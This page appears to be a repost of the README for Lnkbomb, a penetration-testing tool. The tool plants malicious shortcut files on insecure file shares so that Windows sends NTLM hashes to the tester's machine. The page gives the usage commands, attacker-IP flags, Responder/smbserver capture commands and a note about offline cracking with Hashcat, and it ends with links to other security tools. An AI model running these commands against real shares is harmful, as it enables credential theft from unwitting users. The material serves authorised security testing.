Lnkbomb is used for uploading malicious shortcut files to insecure file shares. The vulnerability exists due to Windows looking for an icon file to associate with the shortcut file. This icon file can be directed to a penetration tester’s machine running Responder or smb server to gather NTLMv1 or NTLMv2 hashes (depending on configuration of the victim host machine). The tester can then attempt to crack those collected hashes offline with a tool like Hashcat.
The payload file is uploaded directly to the insecure file specified by the tester in the command line. The tester includes their IP address as well, which is written into the payload.
Installing Lnkbomb
Note that the project works consistently in Windows. It may have issues in Linux.
git clone https://github.com/dievus/lnkbomb.git
Change directories to lnkbomb and run:
python3 lnkbomb.py -h
This will output the help menu, which contains the following flags:
-h, --help - Lists the help options
-t, --target - Specifies the target file share (ex. -t \\192.168.1.1\Share)
-a, --attacker - Specifies the tester's attack machine (ex. -a 192.168.1.2)
-r, --recover - Used to remove the payload when testing is completed (ex. -r randomfilegenerated.recover)
Examples of full commands include:
python3 lnkbomb.py -t \\192.168.1.1\Share -a 192.168.1.2
python3 lnkbomb.py -r randomfilegenerated.recover
You will need to utilize a tool like Responder or smbserver to capture the NTLM hash.responder -I eth0 -dwf -v
or
smbserver.py . . -smb2support
Download Lnkbomb from the releases link on the right side of the page. All flags are the same as the Python version, with the exception of using lnkbomb.exe rather than python3 lnkbomb.py.
Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…